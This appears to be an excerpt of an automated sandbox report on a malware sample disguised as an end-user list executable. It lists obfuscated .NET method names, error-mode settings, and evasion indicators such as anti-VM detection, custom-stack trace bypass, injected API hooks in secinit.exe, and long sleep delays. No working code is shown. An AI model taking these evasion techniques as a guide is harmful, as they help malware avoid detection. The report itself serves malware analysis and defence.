                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, RkZkucFCmd7bABIx7J.csHigh entropy of concatenated method names: 'O27ix7etU6', 'XNoilAWGll', 'pMDi4qPXO2', 'Ok6i37QWD2', 'Iy6io0fiY7', 'nKgiU9q2yD', 'SnciLpacIQ', 'J2uiw8WcLe', 'phsi2wSSvn', 'fJVinIYcrB'
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, rXIDoCycXIihmTOH4D.csHigh entropy of concatenated method names: 'OOyjf6Q0x', 'tZy5bMmEH', 'RWcOEKYfq', 'a2rNU6tax', 'kVxh6fnif', 'rCSPjBIo4', 'EZgivHkhJpMWmDjU4y', 'HugPHb0MGJPMq0ADUR', 'r9grmOEaK', 'IqiYHNJ4E'
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, RLlkK2egaZuT7hqNV7T.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'w9tY18aXin', 'xhLYWM8192', 'ElgYpwGb8m', 'n7UYxqhhy6', 'miiYlIDpw3', 'SL6Y4HbYZq', 'AMoY31V7N8'
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, mcQcxDUbYGvN0DVZDP.csHigh entropy of concatenated method names: 'vG3uwGOZGR', 'KKOunU85Ed', 'lTmrgeqRDq', 'exqreYQRrh', 'TXSu1hGy5d', 'nV0uWcGNLa', 'P3jupFQ7JW', 'zaDuxRHi7D', 'XkAulXQgxA', 'MkAu4bXL7b'
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, Hbtrs6iqqSCX2YUeaW.csHigh entropy of concatenated method names: 'Dispose', 'ToJe2quqs0', 'AAJybk9imG', 'YsUysVNXjr', 'weIenaVysv', 'X8OezxmhWQ', 'ProcessDialogKey', 'zYUygWk99u', 'bfuyexaOdt', 'Lvwyyw0CVu'
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, JR2pYlJuU8KQL6pGaO.csHigh entropy of concatenated method names: 'G2vG40FBfo', 'aekG3XUxN8', 'zwxGoOgvh2', 'ToString', 'bP6GUnpXgY', 'QK4GLSvt2K', 'VtHSM7TvebVQreZb8CH', 'wGE6FlT3XmWDVhSHZKj', 'KdAuMoTc9iYa2epsw8l', 'KH6VsDTrDjF5VZKjrNs'
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, X0CVuXn0niRvldJdGC.csHigh entropy of concatenated method names: 'PeFYRC6xxh', 'jnRYTTMAwr', 'sXWYGZBBpL', 'Ne5YSf3iRL', 'nBRYHSlNcm', 'JV9YXoZaww', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, mWlDMUf1kQ6eejSWkW.csHigh entropy of concatenated method names: 'k25GED6akQ', 'Kh2GivC8Zj', 'P8BGT5Ejko', 'XhEGSpNt21', 'p9LGXdbL19', 'AToToLKZYR', 'C7GTUlNjdj', 'D25TLjRvrO', 'vyOTwVQaN7', 'g6oT24rdcb'
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, icnpecpJIi20s8q7oY.csHigh entropy of concatenated method names: 'eWD8FoPeoI', 'HNi8hsZj4j', 'r018fd3MrN', 'YvO8bheCSL', 'bwM8VFocMu', 'LGv8cIKDDD', 'aq589u9gx7', 'JPb8vKOVxo', 's238qFCARX', 'R3C81SHfXM'
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, iVcVyeXi2nK6pmTWss.csHigh entropy of concatenated method names: 'jT70ECqLdt', 'Uls0AoHLn4', 'Iks0iMUW7e', 'zD00Rrmqgf', 'xJv0TOeytN', 'GA40GZYQwA', 'PJ60SHW6RO', 'MoY0XZGQr0', 'QHx0s7g4VT', 'VlQ0BQo6ib'
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, qDdX9YLn23oJquqs0C.csHigh entropy of concatenated method names: 'mmaHKXmngP', 'HLnHu8D39N', 'wHqHH02qLn', 'KXlHD7O2BE', 'g4QH7iCJRt', 'dG9HdfZAYF', 'Dispose', 'bPfrAWYnDU', 'c8XrijBUcv', 'mjUrR7xQiy'
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, PlSM6Q66RLcIY7AO2y.csHigh entropy of concatenated method names: 'xvxeSkZkuc', 'wmdeX7bABI', 'w9CeBhYZuc', 'g2veQ4sMjq', 'tqIeKDKQWl', 'tMUeZ1kQ6e', 'aS91HyE8VXwOQVCkCH', 'FwPHyZiwPbgPEtEh0h', 'jdqeeKEgZ5', 'wtAe05dV2I'
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, UgOflU9VjnmdU4BJKo.csHigh entropy of concatenated method names: 'ASWSAVJnr1', 'KZoSR03PwW', 'aPTSGhkGEP', 'QmqGnpGfLj', 'J5rGzUmT5Q', 'eZxSg4PtQY', 'YakSeCTOri', 'pBxSyemIkt', 'hdfS00Y1t8', 'FMlS6YS3Rv'
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, VWk99u2efuxaOdt9vw.csHigh entropy of concatenated method names: 'QMBHft6982', 'FAjHb6AjwQ', 'SCwHtqx5dE', 'OLPHVLgi4k', 'PvtHcq7txr', 'mSFHJpdHg8', 'eFcH9L4kL9', 'KtyHv0W8Oj', 'yTSHMAivS0', 'fKIHquNZpe'
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, DSd2Dje6IG8YlqfMUyY.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bgKaHk6XwL', 'tOtaYkR5IK', 'D0SaD0s4XT', 'KmVaah1Elh', 'SHea76EcsM', 'uoWaCpDgUZ', 'jriadjobXT'
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, Oq1gkd4vypHy8EyW4y.csHigh entropy of concatenated method names: 'ToString', 'g2YZ1OYFhc', 'j2eZbOMF0m', 'CRFZtwT8uf', 'TSCZVO7EKO', 'UBBZcPIN21', 'uaPZJOF5m5', 'UVXZ9Z3tDS', 'MFRZvT2bm4', 'NdgZMPfwSa'
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, DbXoYNzDXe27SDLB2w.csHigh entropy of concatenated method names: 'bpBYOqgOEq', 'U0DYFlOGEl', 'VwNYhi1tDx', 'mZCYfQbdIM', 'iBsYbthYuF', 'siLYVVvwnd', 'bmWYcVPSOl', 'rtnYdhoRde', 'MkrYmFs1Zl', 'NguYkAfaC3'
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, JTplmleelqTJiq042GW.csHigh entropy of concatenated method names: 'uRTYnlPioJ', 'wleYzU6mMM', 'iAcDg7x7UN', 'IGtDeZ0PnK', 'qPWDyZDGD2', 'sYRD0r5bXp', 's43D63ieOb', 'DrHDEpR0Qk', 'NfKDApTRn1', 'zDlDipPxMv'
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, vmUj6Ch9ChYZuci2v4.csHigh entropy of concatenated method names: 'yEnR5O0T2y', 'RrRRONahY5', 'CeBRFMorfm', 'zdwRhe4sxI', 'CuvRKHtQLV', 'BIORZYEMvq', 'wqMRuk4ZoG', 'cwpRrOQNhs', 'wE1RHKey1I', 'o1ORYDJBhP'
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, jc2588Mtb2pU3F57by.csHigh entropy of concatenated method names: 'SodSmGWD6I', 'g29SkmkMIZ', 'rPcSjaDg67', 'MSTS5HZfgn', 'BJySIGWOpr', 'PaGSO9hAkH', 'ABTSN9Zxmk', 'P0BSFIvLUX', 'rQ2ShuWrjn', 'oilSPq2I6I'
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, RkZkucFCmd7bABIx7J.csHigh entropy of concatenated method names: 'O27ix7etU6', 'XNoilAWGll', 'pMDi4qPXO2', 'Ok6i37QWD2', 'Iy6io0fiY7', 'nKgiU9q2yD', 'SnciLpacIQ', 'J2uiw8WcLe', 'phsi2wSSvn', 'fJVinIYcrB'
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, rXIDoCycXIihmTOH4D.csHigh entropy of concatenated method names: 'OOyjf6Q0x', 'tZy5bMmEH', 'RWcOEKYfq', 'a2rNU6tax', 'kVxh6fnif', 'rCSPjBIo4', 'EZgivHkhJpMWmDjU4y', 'HugPHb0MGJPMq0ADUR', 'r9grmOEaK', 'IqiYHNJ4E'
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, RLlkK2egaZuT7hqNV7T.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'w9tY18aXin', 'xhLYWM8192', 'ElgYpwGb8m', 'n7UYxqhhy6', 'miiYlIDpw3', 'SL6Y4HbYZq', 'AMoY31V7N8'
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, mcQcxDUbYGvN0DVZDP.csHigh entropy of concatenated method names: 'vG3uwGOZGR', 'KKOunU85Ed', 'lTmrgeqRDq', 'exqreYQRrh', 'TXSu1hGy5d', 'nV0uWcGNLa', 'P3jupFQ7JW', 'zaDuxRHi7D', 'XkAulXQgxA', 'MkAu4bXL7b'
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, Hbtrs6iqqSCX2YUeaW.csHigh entropy of concatenated method names: 'Dispose', 'ToJe2quqs0', 'AAJybk9imG', 'YsUysVNXjr', 'weIenaVysv', 'X8OezxmhWQ', 'ProcessDialogKey', 'zYUygWk99u', 'bfuyexaOdt', 'Lvwyyw0CVu'
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, JR2pYlJuU8KQL6pGaO.csHigh entropy of concatenated method names: 'G2vG40FBfo', 'aekG3XUxN8', 'zwxGoOgvh2', 'ToString', 'bP6GUnpXgY', 'QK4GLSvt2K', 'VtHSM7TvebVQreZb8CH', 'wGE6FlT3XmWDVhSHZKj', 'KdAuMoTc9iYa2epsw8l', 'KH6VsDTrDjF5VZKjrNs'
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, X0CVuXn0niRvldJdGC.csHigh entropy of concatenated method names: 'PeFYRC6xxh', 'jnRYTTMAwr', 'sXWYGZBBpL', 'Ne5YSf3iRL', 'nBRYHSlNcm', 'JV9YXoZaww', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, mWlDMUf1kQ6eejSWkW.csHigh entropy of concatenated method names: 'k25GED6akQ', 'Kh2GivC8Zj', 'P8BGT5Ejko', 'XhEGSpNt21', 'p9LGXdbL19', 'AToToLKZYR', 'C7GTUlNjdj', 'D25TLjRvrO', 'vyOTwVQaN7', 'g6oT24rdcb'
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, icnpecpJIi20s8q7oY.csHigh entropy of concatenated method names: 'eWD8FoPeoI', 'HNi8hsZj4j', 'r018fd3MrN', 'YvO8bheCSL', 'bwM8VFocMu', 'LGv8cIKDDD', 'aq589u9gx7', 'JPb8vKOVxo', 's238qFCARX', 'R3C81SHfXM'
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, iVcVyeXi2nK6pmTWss.csHigh entropy of concatenated method names: 'jT70ECqLdt', 'Uls0AoHLn4', 'Iks0iMUW7e', 'zD00Rrmqgf', 'xJv0TOeytN', 'GA40GZYQwA', 'PJ60SHW6RO', 'MoY0XZGQr0', 'QHx0s7g4VT', 'VlQ0BQo6ib'
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, qDdX9YLn23oJquqs0C.csHigh entropy of concatenated method names: 'mmaHKXmngP', 'HLnHu8D39N', 'wHqHH02qLn', 'KXlHD7O2BE', 'g4QH7iCJRt', 'dG9HdfZAYF', 'Dispose', 'bPfrAWYnDU', 'c8XrijBUcv', 'mjUrR7xQiy'
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, PlSM6Q66RLcIY7AO2y.csHigh entropy of concatenated method names: 'xvxeSkZkuc', 'wmdeX7bABI', 'w9CeBhYZuc', 'g2veQ4sMjq', 'tqIeKDKQWl', 'tMUeZ1kQ6e', 'aS91HyE8VXwOQVCkCH', 'FwPHyZiwPbgPEtEh0h', 'jdqeeKEgZ5', 'wtAe05dV2I'
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, UgOflU9VjnmdU4BJKo.csHigh entropy of concatenated method names: 'ASWSAVJnr1', 'KZoSR03PwW', 'aPTSGhkGEP', 'QmqGnpGfLj', 'J5rGzUmT5Q', 'eZxSg4PtQY', 'YakSeCTOri', 'pBxSyemIkt', 'hdfS00Y1t8', 'FMlS6YS3Rv'
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, VWk99u2efuxaOdt9vw.csHigh entropy of concatenated method names: 'QMBHft6982', 'FAjHb6AjwQ', 'SCwHtqx5dE', 'OLPHVLgi4k', 'PvtHcq7txr', 'mSFHJpdHg8', 'eFcH9L4kL9', 'KtyHv0W8Oj', 'yTSHMAivS0', 'fKIHquNZpe'
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, DSd2Dje6IG8YlqfMUyY.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bgKaHk6XwL', 'tOtaYkR5IK', 'D0SaD0s4XT', 'KmVaah1Elh', 'SHea76EcsM', 'uoWaCpDgUZ', 'jriadjobXT'
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, Oq1gkd4vypHy8EyW4y.csHigh entropy of concatenated method names: 'ToString', 'g2YZ1OYFhc', 'j2eZbOMF0m', 'CRFZtwT8uf', 'TSCZVO7EKO', 'UBBZcPIN21', 'uaPZJOF5m5', 'UVXZ9Z3tDS', 'MFRZvT2bm4', 'NdgZMPfwSa'
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, DbXoYNzDXe27SDLB2w.csHigh entropy of concatenated method names: 'bpBYOqgOEq', 'U0DYFlOGEl', 'VwNYhi1tDx', 'mZCYfQbdIM', 'iBsYbthYuF', 'siLYVVvwnd', 'bmWYcVPSOl', 'rtnYdhoRde', 'MkrYmFs1Zl', 'NguYkAfaC3'
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, JTplmleelqTJiq042GW.csHigh entropy of concatenated method names: 'uRTYnlPioJ', 'wleYzU6mMM', 'iAcDg7x7UN', 'IGtDeZ0PnK', 'qPWDyZDGD2', 'sYRD0r5bXp', 's43D63ieOb', 'DrHDEpR0Qk', 'NfKDApTRn1', 'zDlDipPxMv'
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, vmUj6Ch9ChYZuci2v4.csHigh entropy of concatenated method names: 'yEnR5O0T2y', 'RrRRONahY5', 'CeBRFMorfm', 'zdwRhe4sxI', 'CuvRKHtQLV', 'BIORZYEMvq', 'wqMRuk4ZoG', 'cwpRrOQNhs', 'wE1RHKey1I', 'o1ORYDJBhP'
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, jc2588Mtb2pU3F57by.csHigh entropy of concatenated method names: 'SodSmGWD6I', 'g29SkmkMIZ', 'rPcSjaDg67', 'MSTS5HZfgn', 'BJySIGWOpr', 'PaGSO9hAkH', 'ABTSN9Zxmk', 'P0BSFIvLUX', 'rQ2ShuWrjn', 'oilSPq2I6I'
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, RkZkucFCmd7bABIx7J.csHigh entropy of concatenated method names: 'O27ix7etU6', 'XNoilAWGll', 'pMDi4qPXO2', 'Ok6i37QWD2', 'Iy6io0fiY7', 'nKgiU9q2yD', 'SnciLpacIQ', 'J2uiw8WcLe', 'phsi2wSSvn', 'fJVinIYcrB'
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, rXIDoCycXIihmTOH4D.csHigh entropy of concatenated method names: 'OOyjf6Q0x', 'tZy5bMmEH', 'RWcOEKYfq', 'a2rNU6tax', 'kVxh6fnif', 'rCSPjBIo4', 'EZgivHkhJpMWmDjU4y', 'HugPHb0MGJPMq0ADUR', 'r9grmOEaK', 'IqiYHNJ4E'
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, RLlkK2egaZuT7hqNV7T.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'w9tY18aXin', 'xhLYWM8192', 'ElgYpwGb8m', 'n7UYxqhhy6', 'miiYlIDpw3', 'SL6Y4HbYZq', 'AMoY31V7N8'
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, mcQcxDUbYGvN0DVZDP.csHigh entropy of concatenated method names: 'vG3uwGOZGR', 'KKOunU85Ed', 'lTmrgeqRDq', 'exqreYQRrh', 'TXSu1hGy5d', 'nV0uWcGNLa', 'P3jupFQ7JW', 'zaDuxRHi7D', 'XkAulXQgxA', 'MkAu4bXL7b'
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, Hbtrs6iqqSCX2YUeaW.csHigh entropy of concatenated method names: 'Dispose', 'ToJe2quqs0', 'AAJybk9imG', 'YsUysVNXjr', 'weIenaVysv', 'X8OezxmhWQ', 'ProcessDialogKey', 'zYUygWk99u', 'bfuyexaOdt', 'Lvwyyw0CVu'
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, JR2pYlJuU8KQL6pGaO.csHigh entropy of concatenated method names: 'G2vG40FBfo', 'aekG3XUxN8', 'zwxGoOgvh2', 'ToString', 'bP6GUnpXgY', 'QK4GLSvt2K', 'VtHSM7TvebVQreZb8CH', 'wGE6FlT3XmWDVhSHZKj', 'KdAuMoTc9iYa2epsw8l', 'KH6VsDTrDjF5VZKjrNs'
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, X0CVuXn0niRvldJdGC.csHigh entropy of concatenated method names: 'PeFYRC6xxh', 'jnRYTTMAwr', 'sXWYGZBBpL', 'Ne5YSf3iRL', 'nBRYHSlNcm', 'JV9YXoZaww', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, mWlDMUf1kQ6eejSWkW.csHigh entropy of concatenated method names: 'k25GED6akQ', 'Kh2GivC8Zj', 'P8BGT5Ejko', 'XhEGSpNt21', 'p9LGXdbL19', 'AToToLKZYR', 'C7GTUlNjdj', 'D25TLjRvrO', 'vyOTwVQaN7', 'g6oT24rdcb'
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, icnpecpJIi20s8q7oY.csHigh entropy of concatenated method names: 'eWD8FoPeoI', 'HNi8hsZj4j', 'r018fd3MrN', 'YvO8bheCSL', 'bwM8VFocMu', 'LGv8cIKDDD', 'aq589u9gx7', 'JPb8vKOVxo', 's238qFCARX', 'R3C81SHfXM'
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, iVcVyeXi2nK6pmTWss.csHigh entropy of concatenated method names: 'jT70ECqLdt', 'Uls0AoHLn4', 'Iks0iMUW7e', 'zD00Rrmqgf', 'xJv0TOeytN', 'GA40GZYQwA', 'PJ60SHW6RO', 'MoY0XZGQr0', 'QHx0s7g4VT', 'VlQ0BQo6ib'
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, qDdX9YLn23oJquqs0C.csHigh entropy of concatenated method names: 'mmaHKXmngP', 'HLnHu8D39N', 'wHqHH02qLn', 'KXlHD7O2BE', 'g4QH7iCJRt', 'dG9HdfZAYF', 'Dispose', 'bPfrAWYnDU', 'c8XrijBUcv', 'mjUrR7xQiy'
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, PlSM6Q66RLcIY7AO2y.csHigh entropy of concatenated method names: 'xvxeSkZkuc', 'wmdeX7bABI', 'w9CeBhYZuc', 'g2veQ4sMjq', 'tqIeKDKQWl', 'tMUeZ1kQ6e', 'aS91HyE8VXwOQVCkCH', 'FwPHyZiwPbgPEtEh0h', 'jdqeeKEgZ5', 'wtAe05dV2I'
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: 022QCX_End_User_List_2025.exe PID: 6372, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeMemory allocated: 2C40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeMemory allocated: 2E60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeMemory allocated: 8090000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeMemory allocated: 9090000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeMemory allocated: 9250000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeMemory allocated: A250000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeMemory allocated: A5D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeMemory allocated: B5D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E096E rdtsc 2_2_012E096E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeWindow / User API: threadDelayed 9957Jump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeWindow / User API: threadDelayed 9838Jump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\secinit.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\secinit.exe TID: 6032Thread sleep count: 134 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\secinit.exe TID: 6032Thread sleep time: -268000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exe TID: 6032Thread sleep count: 9838 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\secinit.exe TID: 6032Thread sleep time: -19676000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe TID: 5356Thread sleep time: -35000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\secinit.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0309C750 FindFirstFileW,FindNextFileW,FindClose,7_2_0309C750
